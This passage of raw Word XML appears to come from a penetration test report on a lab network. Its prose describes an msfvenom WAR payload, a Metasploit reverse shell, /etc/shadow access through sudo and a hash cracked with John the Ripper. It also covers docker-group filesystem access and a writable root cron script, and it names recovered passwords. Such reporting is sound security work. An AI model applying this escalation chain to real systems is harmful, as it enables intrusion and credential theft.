    <w:p w14:paraId="6294F7A8" w14:textId="12AC90E0" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="000833BC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image 5.2: Creating malicious code using msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403815E2" w14:textId="68DD8D37" w:rsidR="00140952" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A Metasploit listener was configured in multi/handler using LHOST 10.0.1.158 and LPORT 4444 to match the deployed WAR payload</w:t>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="105" w:name="paragraph53"/>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource53"</w:instrText>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.35</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:bookmarkStart w:id="106" w:name="paragraph54"/>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource54"</w:instrText>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.36</w:t>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. After visiting the malicious WAR path, the payload executed, and a reverse shell was established</w:t>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="107" w:name="paragraph55"/>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource55"</w:instrText>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F6D1C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.37</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. The compromised session confirmed the active user as redlowo</w:t>
      </w:r>
      <w:r w:rsidR="000833BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in Image 5.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9689A" w14:textId="64A59AFF" w:rsidR="00140952" w:rsidRPr="00D77DFE" w:rsidRDefault="00140952" w:rsidP="004A072B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3007106F" wp14:editId="75E6AB3C">
            <wp:extent cx="3067050" cy="1076730"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="792522523" name="Picture 1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22523" name="Picture 19" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3074077" cy="1079197"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E09DF" w14:textId="013E9933" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="004A072B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image 5.3: Receiving reverse shell using multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F3C4F" w14:textId="35477399" w:rsidR="00AE369A" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Privilege review showed that redlowo could run /usr/local/bin/view_last_shadow_lines.sh with sudo, allowing retrieval of the final line of /etc/shadow</w:t>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="108" w:name="paragraph56"/>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource56"</w:instrText>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.38</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidR="004A072B"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 The extracted hash for the stocznia account was cracked offline with John the Ripper, yielding the password gdansk, enabling elevation to the stocznia user</w:t>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="109" w:name="paragraph57"/>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource57"</w:instrText>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A072B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.39</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidR="00FE5290"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F40D4" w14:textId="792B3231" w:rsidR="00DD5501" w:rsidRPr="00D77DFE" w:rsidRDefault="00DD5501" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc223521126"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.5 Post Exploitation and </w:t>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in 10.0.2.178</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="7C597EB5" w14:textId="429283CF" w:rsidR="00AE369A" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="008F7A55">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Further assessment revealed that stocznia belonged to the docker group</w:t>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="111" w:name="paragraph58"/>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource58"</w:instrText>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.40</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:r w:rsidR="00FE5290"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 Testing a container with a bind mount demonstrated unrestricted host filesystem access, exposing /home/sopot/</w:t>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="112" w:name="paragraph59"/>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource59"</w:instrText>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.41</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidR="00FE5290"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 Inside this directory, the file my_backup.save referenced a keyword (“krzywydomek”), which successfully authenticated the tester as the sopot user</w:t>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="113" w:name="paragraph60"/>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource60"</w:instrText>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.42</w:t>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:bookmarkStart w:id="114" w:name="paragraph61"/>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource61"</w:instrText>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FE5290" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.43</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidR="008F7A55"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B0B18" w14:textId="20A68A27" w:rsidR="00A26206" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege analysis for sopot identified a critical escalation vector in /etc/crontab, which executes /opt/backup.sh as root every minute. Although owned by root, the file was writable by the admins group, of which sopot is a member. This misconfiguration enables modification of the script to run arbitrary commands with root privileges upon the next cron execution cycle</w:t>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="115" w:name="paragraph62"/>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
